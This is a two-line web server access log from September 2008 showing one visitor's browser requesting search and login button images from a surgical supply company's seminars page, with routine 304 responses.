71.119.54.161 - - [09/Sep/2008:00:58:50 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
71.119.54.161 - - [09/Sep/2008:00:58:50 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/seminars.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
